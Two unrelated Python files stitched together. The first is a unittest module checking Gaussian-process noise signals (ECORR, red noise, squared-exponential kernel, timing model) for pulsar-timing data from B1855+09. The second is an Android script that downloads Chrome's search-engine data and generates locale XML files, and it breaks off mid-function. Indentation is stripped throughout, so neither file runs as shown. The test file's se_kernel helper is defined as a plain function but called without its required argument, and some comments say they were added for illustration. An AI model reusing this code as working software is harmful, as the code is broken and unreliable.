def se_kernel(etoas, log10_sigma=-7, log10_lam=np.log10(30 * 86400)):
tm = np.abs(etoas[None, :] - etoas[:, None])
d = np.eye(tm.shape[0]) * 10 ** (2 * (log10_sigma - 1.5))
return 10 ** (2 * log10_sigma) * np.exp(-(tm ** 2) / 2 / 10 ** (2 * log10_lam)) + d
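# The helper above is an ordinary squared-exponential (RBF) kernel on the
# epoch-averaged TOAs, k(t_i, t_j) = sigma**2 * exp(-(t_i - t_j)**2 / (2 * lam**2)),
# with sigma = 10**log10_sigma and lam = 10**log10_lam, plus a small diagonal
# term (sigma**2 * 1e-3) added for numerical stability.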
class TestGPSignals(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Setup the Pulsar object."""
# initialize Pulsar class
cls.psr = Pulsar(datadir + "/B1855+09_NANOGrav_9yv1.gls.par", datadir + "/B1855+09_NANOGrav_9yv1.tim")
def test_ecorr(self):
"""Test that ecorr signal returns correct values."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr)
ecm = ec(self.psr)
# parameters
ecorr = -6.4
params = {"B1855+09_basis_ecorr_log10_ecorr": ecorr}
# basis matrix test
U = utils.create_quantization_matrix(self.psr.toas)[0]
msg = "U matrix incorrect for Basis Ecorr signal."
assert np.allclose(U, ecm.get_basis(params)), msg
# Jvec test
jvec = 10 ** (2 * ecorr) * np.ones(U.shape[1])
msg = "Prior vector incorrect for Basis Ecorr signal."
assert np.all(ecm.get_phi(params) == jvec), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Basis Ecorr signal."
assert np.all(ecm.get_phiinv(params) == 1 / jvec), msg
# test shape
msg = "U matrix shape incorrect"
assert ecm.get_basis(params).shape == U.shape, msg
def test_ecorr_backend(self):
"""Test that ecorr-backend signal returns correct values."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
selection = Selection(selections.by_backend)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr, selection=selection)
ecm = ec(self.psr)
# parameters
ecorrs = [-6.1, -6.2, -6.3, -6.4]
params = {
"B1855+09_basis_ecorr_430_ASP_log10_ecorr": ecorrs[0],
"B1855+09_basis_ecorr_430_PUPPI_log10_ecorr": ecorrs[1],
"B1855+09_basis_ecorr_L-wide_ASP_log10_ecorr": ecorrs[2],
"B1855+09_basis_ecorr_L-wide_PUPPI_log10_ecorr": ecorrs[3],
}
# get the basis
bflags = self.psr.backend_flags
Umats = []
for flag in np.unique(bflags):
mask = bflags == flag
Umats.append(utils.create_quantization_matrix(self.psr.toas[mask])[0])
nepoch = sum(U.shape[1] for U in Umats)
U = np.zeros((len(self.psr.toas), nepoch))
jvec = np.zeros(nepoch)
netot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Umats[ct].shape[1]
U[mask, netot : nn + netot] = Umats[ct]
jvec[netot : nn + netot] = 10 ** (2 * ecorrs[ct])
netot += nn
# basis matrix test
msg = "U matrix incorrect for Basis Ecorr-backend signal."
assert np.allclose(U, ecm.get_basis(params)), msg
# Jvec test
msg = "Prior vector incorrect for Basis Ecorr backend signal."
assert np.all(ecm.get_phi(params) == jvec), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Basis Ecorr backend signal."
assert np.all(ecm.get_phiinv(params) == 1 / jvec), msg
# test shape
msg = "U matrix shape incorrect"
assert ecm.get_basis(params).shape == U.shape, msg
def test_kernel(self):
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, name="se")
sem = se(self.psr)
# parameters
log10_lam, log10_sigma = 7.4, -6.4
params = {"B1855+09_se_log10_lam": log10_lam, "B1855+09_se_log10_sigma": log10_sigma}
# basis check
U, avetoas = create_quant_matrix(self.psr.toas, dt=7 * 86400)
msg = "Kernel Basis incorrect"
assert np.allclose(U, sem.get_basis(params)), msg
# kernel test
K = se_kernel(avetoas, log10_lam=log10_lam, log10_sigma=log10_sigma)
msg = "Kernel incorrect"
assert np.allclose(K, sem.get_phi(params)), msg
# inverse kernel test
Kinv = np.linalg.inv(K)
msg = "Kernel inverse incorrect"
assert np.allclose(Kinv, sem.get_phiinv(params)), msg
def test_kernel_backend(self):
# set up signal parameter
selection = Selection(selections.by_backend)
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, selection=selection, name="se")
sem = se(self.psr)
# parameters
log10_sigmas = [-7, -6, -6.4, -8.5]
log10_lams = [8.3, 7.4, 6.8, 5.6]
params = {
"B1855+09_se_430_ASP_log10_lam": log10_lams[0],
"B1855+09_se_430_ASP_log10_sigma": log10_sigmas[0],
"B1855+09_se_430_PUPPI_log10_lam": log10_lams[1],
"B1855+09_se_430_PUPPI_log10_sigma": log10_sigmas[1],
"B1855+09_se_L-wide_ASP_log10_lam": log10_lams[2],
"B1855+09_se_L-wide_ASP_log10_sigma": log10_sigmas[2],
"B1855+09_se_L-wide_PUPPI_log10_lam": log10_lams[3],
"B1855+09_se_L-wide_PUPPI_log10_sigma": log10_sigmas[3],
}
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
U, avetoas = create_quant_matrix(self.psr.toas[mask], dt=7 * 86400)
Fmats.append(U)
fs.append(avetoas)
phis.append(se_kernel(avetoas, log10_sigma=log10_sigmas[ct], log10_lam=log10_lams[ct]))
nf = sum(F.shape[1] for F in Fmats)
U = np.zeros((len(self.psr.toas), nf))
K = sl.block_diag(*phis)
Kinv = np.linalg.inv(K)
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
U[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
msg = "Kernel basis incorrect for backend signal."
assert np.allclose(U, sem.get_basis(params)), msg
# spectrum test
msg = "Kernel incorrect for backend signal."
assert np.allclose(sem.get_phi(params), K), msg
# inverse spectrum test
msg = "Kernel inverse incorrect for backend signal."
assert np.allclose(sem.get_phiinv(params), Kinv), msg
def test_fourier_red_noise(self):
"""Test that red noise signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30)
rnm = rn(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
# basis matrix test
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_noise_pshift(self):
"""Test that red noise signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30, pshift=True, pseed=42)
rnm = rn(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
# basis matrix test
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30, pshift=True, pseed=42)
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_user_freq_array(self):
"""Test that red noise signal returns correct values with user defined
frequency array."""
# set parameters
log10_A, gamma = -14.5, 4.33
params = {"B1855+09_red_noise_log10_A": log10_A, "B1855+09_red_noise_gamma": gamma}
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
# set up signal model. use list of frequencies to make basis
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, modes=f2[::2])
rnm = rn(self.psr)
# basis matrix test
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_fourier_red_noise_backend(self):
"""Test that red noise-backend signal returns correct values."""
# set up signal parameter
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
selection = Selection(selections.by_backend)
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30, selection=selection)
rnm = rn(self.psr)
# parameters
log10_As = [-14, -14.4, -15, -14.8]
gammas = [2.3, 4.4, 1.8, 5.6]
params = {
"B1855+09_red_noise_430_ASP_gamma": gammas[0],
"B1855+09_red_noise_430_PUPPI_gamma": gammas[1],
"B1855+09_red_noise_L-wide_ASP_gamma": gammas[2],
"B1855+09_red_noise_L-wide_PUPPI_gamma": gammas[3],
"B1855+09_red_noise_430_ASP_log10_A": log10_As[0],
"B1855+09_red_noise_430_PUPPI_log10_A": log10_As[1],
"B1855+09_red_noise_L-wide_ASP_log10_A": log10_As[2],
"B1855+09_red_noise_L-wide_PUPPI_log10_A": log10_As[3],
}
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
F, f = utils.createfourierdesignmatrix_red(self.psr.toas[mask], 30)
Fmats.append(F)
fs.append(f)
phis.append(utils.powerlaw(f, log10_As[ct], gammas[ct]))
nf = sum(F.shape[1] for F in Fmats)
F = np.zeros((len(self.psr.toas), nf))
phi = np.hstack([p for p in phis])
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
F[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
msg = "F matrix incorrect for GP Fourier backend signal."
assert np.allclose(F, rnm.get_basis(params)), msg
# spectrum test
msg = "Spectrum incorrect for GP Fourier backend signal."
assert np.all(rnm.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier backend signal."
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert rnm.get_basis(params).shape == F.shape, msg
def test_red_noise_add(self):
"""Test that red noise addition only returns independent columns."""
# set up signals
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
cpl = utils.powerlaw(
log10_A=parameter.Uniform(-18, -12)("log10_Agw"), gamma=parameter.Uniform(1, 7)("gamma_gw")
)
# parameters
log10_A, gamma = -14.5, 4.33
log10_Ac, gammac = -15.5, 1.33
params = {
"B1855+09_red_noise_log10_A": log10_A,
"B1855+09_red_noise_gamma": gamma,
"log10_Agw": log10_Ac,
"gamma_gw": gammac,
}
Tmax = self.psr.toas.max() - self.psr.toas.min()
tpars = [
(30, 20, Tmax, Tmax),
(20, 30, Tmax, Tmax),
(30, 30, Tmax, Tmax),
(30, 20, Tmax, 1.123 * Tmax),
(20, 30, Tmax, 1.123 * Tmax),
(30, 30, 1.123 * Tmax, Tmax),
]
for (nf1, nf2, T1, T2) in tpars:
rn = gp_signals.FourierBasisGP(spectrum=pl, components=nf1, Tspan=T1)
crn = gp_signals.FourierBasisGP(spectrum=cpl, components=nf2, Tspan=T2)
s = rn + crn
rnm = s(self.psr)
# set up frequencies
F1, f1 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=nf1, Tspan=T1)
F2, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=nf2, Tspan=T2)
# test power spectrum
p1 = utils.powerlaw(f1, log10_A, gamma)
p2 = utils.powerlaw(f2, log10_Ac, gammac)
if T1 == T2:
nf = max(2 * nf1, 2 * nf2)
phi = np.zeros(nf)
F = F1 if nf1 > nf2 else F2
phi[: 2 * nf1] = p1
phi[: 2 * nf2] += p2
                # when T1 == T2 the two bases share the same Fourier columns, so the
                # combined basis is simply the larger of the two matrices chosen above
else:
phi = np.concatenate((p1, p2))
F = np.hstack((F1, F2))
msg = "Combined red noise PSD incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phi(params) == phi), msg
msg = "Combined red noise PSD inverse incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
msg = "Combined red noise Fmat incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.allclose(F, rnm.get_basis(params)), msg
def test_red_noise_add_backend(self):
"""Test that red noise with backend addition only returns
independent columns."""
# set up signals
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
selection = Selection(selections.by_backend)
cpl = utils.powerlaw(
log10_A=parameter.Uniform(-18, -12)("log10_Agw"), gamma=parameter.Uniform(1, 7)("gamma_gw")
)
# parameters
log10_As = [-14, -14.4, -15, -14.8]
gammas = [2.3, 4.4, 1.8, 5.6]
log10_Ac, gammac = -15.5, 1.33
params = {
"B1855+09_red_noise_430_ASP_gamma": gammas[0],
"B1855+09_red_noise_430_PUPPI_gamma": gammas[1],
"B1855+09_red_noise_L-wide_ASP_gamma": gammas[2],
"B1855+09_red_noise_L-wide_PUPPI_gamma": gammas[3],
"B1855+09_red_noise_430_ASP_log10_A": log10_As[0],
"B1855+09_red_noise_430_PUPPI_log10_A": log10_As[1],
"B1855+09_red_noise_L-wide_ASP_log10_A": log10_As[2],
"B1855+09_red_noise_L-wide_PUPPI_log10_A": log10_As[3],
"log10_Agw": log10_Ac,
"gamma_gw": gammac,
}
Tmax = self.psr.toas.max() - self.psr.toas.min()
tpars = [
(30, 20, Tmax, Tmax),
(20, 30, Tmax, Tmax),
(30, 30, Tmax, Tmax),
(30, 20, Tmax, 1.123 * Tmax),
(20, 30, Tmax, 1.123 * Tmax),
(30, 30, 1.123 * Tmax, Tmax),
(30, 20, None, Tmax),
]
for (nf1, nf2, T1, T2) in tpars:
rn = gp_signals.FourierBasisGP(spectrum=pl, components=nf1, Tspan=T1, selection=selection)
crn = gp_signals.FourierBasisGP(spectrum=cpl, components=nf2, Tspan=T2)
s = rn + crn
rnm = s(self.psr)
# get the basis
bflags = self.psr.backend_flags
Fmats, fs, phis = [], [], []
F2, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nf2, Tspan=T2)
p2 = utils.powerlaw(f2, log10_Ac, gammac)
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
F1, f1 = utils.createfourierdesignmatrix_red(self.psr.toas[mask], nf1, Tspan=T1)
Fmats.append(F1)
fs.append(f1)
phis.append(utils.powerlaw(f1, log10_As[ct], gammas[ct]))
Fmats.append(F2)
phis.append(p2)
nf = sum(F.shape[1] for F in Fmats)
F = np.zeros((len(self.psr.toas), nf))
phi = np.hstack([p for p in phis])
nftot = 0
for ct, flag in enumerate(np.unique(bflags)):
mask = bflags == flag
nn = Fmats[ct].shape[1]
F[mask, nftot : nn + nftot] = Fmats[ct]
nftot += nn
F[:, -2 * nf2 :] = F2
msg = "Combined red noise PSD incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phi(params) == phi), msg
msg = "Combined red noise PSD inverse incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.all(rnm.get_phiinv(params) == 1 / phi), msg
msg = "Combined red noise Fmat incorrect "
msg += "for {} {} {} {}".format(nf1, nf2, T1, T2)
assert np.allclose(F, rnm.get_basis(params)), msg
def test_gp_timing_model(self):
"""Test that the timing model signal returns correct values."""
# set up signal parameter
ts = gp_signals.TimingModel()
tm = ts(self.psr)
# basis matrix test
M = self.psr.Mmat.copy()
norm = np.sqrt(np.sum(M ** 2, axis=0))
M /= norm
params = {}
msg = "M matrix incorrect for Timing Model signal."
assert np.allclose(M, tm.get_basis(params)), msg
# Jvec test
phi = np.ones(self.psr.Mmat.shape[1]) * 1e40
msg = "Prior vector incorrect for Timing Model signal."
assert np.all(tm.get_phi(params) == phi), msg
# inverse Jvec test
msg = "Prior vector inverse incorrect for Timing Model signal."
assert np.all(tm.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "M matrix shape incorrect"
assert tm.get_basis(params).shape == self.psr.Mmat.shape, msg
def test_gp_parameter(self):
"""Test GP basis model with parameterized basis."""
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(0, 7))
basis_env = utils.createfourierdesignmatrix_env(
log10_Amp=parameter.Uniform(-10, -5), t0=parameter.Uniform(4.3e9, 5e9), log10_Q=parameter.Uniform(0, 4)
)
basis_red = utils.createfourierdesignmatrix_red()
rn_env = gp_signals.BasisGP(pl, basis_env, name="env")
rn = gp_signals.BasisGP(pl, basis_red)
s = rn_env + rn
m = s(self.psr)
# parameters
log10_A, gamma = -14.5, 4.33
log10_A_env, gamma_env = -14.0, 2.5
log10_Amp, log10_Q, t0 = -7.3, np.log10(345), 55000 * 86400
params = {
"B1855+09_log10_A": log10_A,
"B1855+09_gamma": gamma,
"B1855+09_env_log10_A": log10_A_env,
"B1855+09_env_gamma": gamma_env,
"B1855+09_env_log10_Q": log10_Q,
"B1855+09_env_log10_Amp": log10_Amp,
"B1855+09_env_t0": t0,
}
# get basis
Fred, f2_red = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
Fenv, f2_env = utils.createfourierdesignmatrix_env(
self.psr.toas, nmodes=30, log10_Amp=log10_Amp, log10_Q=log10_Q, t0=t0
)
F = np.hstack((Fenv, Fred))
phi_env = utils.powerlaw(f2_env, log10_A=log10_A_env, gamma=gamma_env)
phi_red = utils.powerlaw(f2_red, log10_A=log10_A, gamma=gamma)
phi = np.concatenate((phi_env, phi_red))
# basis matrix test
msg = "F matrix incorrect for GP Fourier signal."
assert np.allclose(F, m.get_basis(params)), msg
# spectrum test
msg = "Spectrum incorrect for GP Fourier signal."
assert np.all(m.get_phi(params) == phi), msg
# inverse spectrum test
msg = "Spectrum inverse incorrect for GP Fourier signal."
assert np.all(m.get_phiinv(params) == 1 / phi), msg
# test shape
msg = "F matrix shape incorrect"
assert m.get_basis(params).shape == F.shape, msg
def test_combine_signals(self):
"""Test for combining different signals."""
# set up signal parameter
ecorr = parameter.Uniform(-10, -5)
ec = gp_signals.EcorrBasisModel(log10_ecorr=ecorr)
pl = utils.powerlaw(log10_A=parameter.Uniform(-18, -12), gamma=parameter.Uniform(1, 7))
rn = gp_signals.FourierBasisGP(spectrum=pl, components=30)
log10_sigma = parameter.Uniform(-10, -5)
log10_lam = parameter.Uniform(np.log10(86400), np.log10(1500 * 86400))
basis = create_quant_matrix(dt=7 * 86400)
prior = se_kernel(log10_sigma=log10_sigma, log10_lam=log10_lam)
se = gp_signals.BasisGP(prior, basis, name="se")
ts = gp_signals.TimingModel()
s = ec + rn + ts + se
m = s(self.psr)
# parameters
ecorr = -6.4
log10_A, gamma = -14.5, 4.33
log10_lam, log10_sigma = 7.4, -6.4
params = {
"B1855+09_basis_ecorr_log10_ecorr": ecorr,
"B1855+09_red_noise_log10_A": log10_A,
"B1855+09_red_noise_gamma": gamma,
"B1855+09_se_log10_lam": log10_lam,
"B1855+09_se_log10_sigma": log10_sigma,
}
# combined basis matrix
U = utils.create_quantization_matrix(self.psr.toas)[0]
M = self.psr.Mmat.copy()
norm = np.sqrt(np.sum(M ** 2, axis=0))
M /= norm
F, f2 = utils.createfourierdesignmatrix_red(self.psr.toas, nmodes=30)
U2, avetoas = create_quant_matrix(self.psr.toas, dt=7 * 86400)
T = np.hstack((U, F, M, U2))
# combined prior vector
jvec = 10 ** (2 * ecorr) * np.ones(U.shape[1])
phim = np.ones(self.psr.Mmat.shape[1]) * 1e40
phi = utils.powerlaw(f2, log10_A=log10_A, gamma=gamma)
K = se_kernel(avetoas, log10_lam=log10_lam, log10_sigma=log10_sigma)
phivec = np.concatenate((jvec, phi, phim))
phi = sl.block_diag(np.diag(phivec), K)
phiinv = np.linalg.inv(phi)
# basis matrix test
msg = "Basis matrix incorrect for combined signal."
assert np.allclose(T, m.get_basis(params)), msg
        # Kernel test
msg = "Prior matrix incorrect for combined signal."
assert np.allclose(m.get_phi(params), phi), msg
# inverse Kernel test
msg = "Prior matrix inverse incorrect for combined signal."
assert np.allclose(m.get_phiinv(params), phiinv), msg
# test shape
msg = "Basis matrix shape incorrect size for combined signal."
assert m.get_basis(params).shape == T.shape, msg
class TestGPSignalsPint(TestGPSignals):
@classmethod
def setUpClass(cls):
"""Setup the Pulsar object."""
# initialize Pulsar class
cls.psr = Pulsar(
datadir + "/B1855+09_NANOGrav_9yv1.gls.par",
datadir + "/B1855+09_NANOGrav_9yv1.tim",
ephem="DE430",
timing_package="pint",
)
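if __name__ == "__main__":
    # Convenience entry point (added here for illustration, not part of the
    # original test module): lets the GP-signal tests be run directly.
    unittest.main()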
|
|
#!/usr/bin/python2.4
#
# Copyright (C) 2010 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Creates the list of search engines
The created list is placed in the res/values-<locale> directory. Also updates
res/values/all_search_engines.xml if required with new data.
Usage: get_search_engines.py
Copyright (C) 2010 The Android Open Source Project
"""
import os
import re
import sys
import urllib
from xml.dom import minidom
# Locales to generate search engine lists for
locales = ["cs-CZ", "da-DK", "de-AT", "de-CH", "de-DE", "el-GR", "en-AU",
"en-GB", "en-IE", "en-NZ", "en-SG", "en-ZA", "es-ES", "fr-BE", "fr-FR",
"it-IT", "ja-JP", "ko-KR", "nb-NO", "nl-BE", "nl-NL", "pl-PL", "pt-PT",
"pt-BR", "ru-RU", "sv-SE", "tr-TR", "zh-CN", "zh-HK", "zh-MO", "zh-TW"]
google_data = ["google", "Google", "google.com",
"http://www.google.com/favicon.ico",
"http://www.google.com/search?ie={inputEncoding}&source=android-browser&q={searchTerms}",
"UTF-8",
"http://www.google.com/complete/search?client=android&q={searchTerms}"]
class SearchEngineManager(object):
"""Manages list of search engines and creates locale specific lists.
The main method useful for the caller is generateListForLocale(), which
creates a locale specific donottranslate-search_engines.xml file.
"""
def __init__(self):
"""Inits SearchEngineManager with relevant search engine data.
The search engine data is downloaded from the Chrome source repository.
"""
self.chrome_data = urllib.urlopen(
'http://src.chromium.org/viewvc/chrome/trunk/src/chrome/'
'browser/search_engines/template_url_prepopulate_data.cc').read()
if self.chrome_data.lower().find('repository not found') != -1:
print 'Unable to get Chrome source data for search engine list.\nExiting.'
sys.exit(2)
self.resdir = os.path.normpath(os.path.join(sys.path[0], '../res'))
self.all_engines = set()
def getXmlString(self, str):
"""Returns an XML-safe string for the given string.
Given a string from the search engine data structure, convert it to a
string suitable to write to our XML data file by stripping away NULLs,
unwanted quotes, wide-string declarations (L"") and replacing C-style
unicode characters with XML equivalents.
"""
str = str.strip()
if str.upper() == 'NULL':
return ''
if str.startswith('L"'):
str = str[2:]
if str.startswith('@') or str.startswith('?'):
str = '\\' + str
str = str.strip('"')
    str = str.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
    str = str.replace('"', '&quot;').replace('\'', '&apos;')
str = re.sub(r'\\x([a-fA-F0-9]{1,4})', r'&#x\1;', str)
return str
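  # Illustrative example only (the input string is hypothetical, not taken from
  # the Chrome data file): an entry such as
  #     L"Pr\x0113mija"
  # comes back from this method as
  #     Pr&#x0113;mija
  # after the wide-string prefix and quotes are stripped and the C-style escape
  # is rewritten as an XML character reference.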
def getEngineData(self, name):
"""Returns an array of strings describing the specified search engine.
The returned strings are in the same order as in the Chrome source data file
except that the internal name of the search engine is inserted at the
beginning of the list.
"""
if name == "google":
return google_data
    # Find the first occurrence of this search engine name in the form
# " <name> =" in the chrome data file.
re_exp = '\s' + name + '\s*='
search_obj = re.search(re_exp, self.chrome_data)
if not search_obj:
print ('Unable to find data for search engine ' + name +
'. Please check the chrome data file for format changes.')
return None
# Extract the struct declaration between the curly braces.
start_pos = self.chrome_data.find('{', search_obj.start()) + 1;
end_pos = self.chrome_data.find('};', start_pos);
engine_data_str = self.chrome_data[start_pos:end_pos]
# Remove c++ style '//' comments at the ends of each line
engine_data_lines = engine_data_str.split('\n')
engine_data_str = ""
for line in engine_data_lines:
start_pos = line.find(' // ')
if start_pos != -1:
line = line[:start_pos]
engine_data_str = engine_data_str + line + '\n'
# Join multiple line strings into a single string.
engine_data_str = re.sub('\"\s+\"', '', engine_data_str)
engine_data_str = re.sub('\"\s+L\"', '', engine_data_str)
engine_data_str = engine_data_str.replace('"L"', '')
engine_data = engine_data_str.split(',')
for i in range(len(engine_data)):
engine_data[i] = self.getXmlString(engine_data[i])
# If the last element was an empty string (due to an extra comma at the
# end), ignore it.
if not engine_data[len(engine_data) - 1]:
engine_data.pop()
engine_data.insert(0, name)
return engine_data
def getSearchEnginesForCountry(self, country):
"""Returns the list of search engine names for the given country.
The data comes from the Chrome data file.
"""
# The Chrome data file has an array defined with the name 'engines_XX'
# where XX = country.
pos = self.chrome_data.find('engines_' + country)
if pos == -1:
print ('Unable to find search engine data for country ' + country + '.')
return
# Extract the text between the curly braces for this array declaration
engines_start = self.chrome_data.find('{', pos) + 1;
engines_end = self.chrome_data.find('}', engines_start);
engines_str = self.chrome_data[engines_start:engines_end]
# Remove embedded /**/ style comments, white spaces, address-of operators
# and the trailing comma if any.
engines_str = re.sub('\/\*.+\*\/', '', engines_str)
engines_str = re.sub('\s+', '', engines_str)
engines_str = engines_str.replace('&','')
engines_str = engines_str.rstrip(',')
    # Split the array into its elements
engines = engines_str.split(',')
return engines
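  # Illustrative sketch of the input being parsed (not an actual entry from the
  # Chrome file): a declaration like
  #     const PrepopulatedEngine* engines_GB[] = { &google, &bing_en_GB, };
  # yields ['google', 'bing_en_GB'] after comments, whitespace, '&' and the
  # trailing comma are stripped above.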
def writeAllEngines(self):
"""Writes all search engines to the all_search_engines.xml file.
"""
all_search_engines_path = os.path.join(self.resdir, 'values/all_search_engines.xml')
text = []
for engine_name in self.all_engines:
engine_data = self.getEngineData(engine_name)
text.append(' <string-array name="%s" translatable="false">\n' % (engine_data[0]))
for i in range(1, 7):
text.append(' <item>%s</item>\n' % (engine_data[i]))
text.append(' </string-array>\n')
print engine_data[1] + " added to all_search_engines.xml"
self.generateXmlFromTemplate(os.path.join(sys.path[0], 'all_search_engines.template.xml'),
all_search_engines_path, text)
def generateDefaultList(self):
self.writeEngineList(os.path.join(self.resdir, 'values'), "default")
def generateListForLocale(self, locale):
"""Creates a new locale specific donottranslate-search_engines.xml file.
The new file contains search engines specific to that country. If required
this function updates all_search_engines.xml file with any new search
engine data necessary.
"""
separator_pos = locale.find('-')
if separator_pos == -1:
print ('Locale must be of format <language>-<country>. For e.g.'
' "es-US" or "en-GB"')
return
language = locale[0:separator_pos]
country = locale[separator_pos + 1:].upper()
dir_path = os.path.join(self.resdir, 'values-' + language + '-r' + country)
self.writeEngineList(dir_path, country)
def writeEngineList(self, dir_path, country):
if os.path.exists(dir_path) and not os.path.isdir(dir_path):
print "File exists in output directory path " + dir_path + ". Please remove it and try again."
return
engines = self.getSearchEnginesForCountry(country)
if not engines:
return
for engine in engines:
self.all_engines.add(engine)
# Create the locale specific search_engines.xml file. Each
# search_engines.xml file has a hardcoded list of 7 items. If there are less
# than 7 search engines for this country, the remaining items are marked as
# enabled=false.
text = []
text.append(' <string-array name="search_engines">\n');
for engine in engines:
engine_data = self.getEngineData(engine)
name = engine_data[0]
text.append(' <item>%s</item>\n' % (name))
text.append(' </string-array>\n');
self.generateXmlFromTemplate(os.path.join(sys.path[0], 'search_engines.template.xml'),
os.path.join(dir_path, 'donottranslate-search_engines.xml'),
text)
def generateXmlFromTemplate(self, template_path, out_path, text):
# Load the template file and insert the new contents before the last line.
template_text = open(template_path).read()
pos = template_text.rfind('\n', 0, -2) + 1
contents = template_text[0:pos] + ''.join(text) + template_text[pos:]
# Make sure what we have created is valid XML :) No need to check for errors
# as the script will terminate with an exception if the XML was malformed.
engines_dom = minidom.parseString(contents)
dir_path = os.path.dirname(out_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
print 'Created directory ' + dir_path
file = open(out_path, 'w')
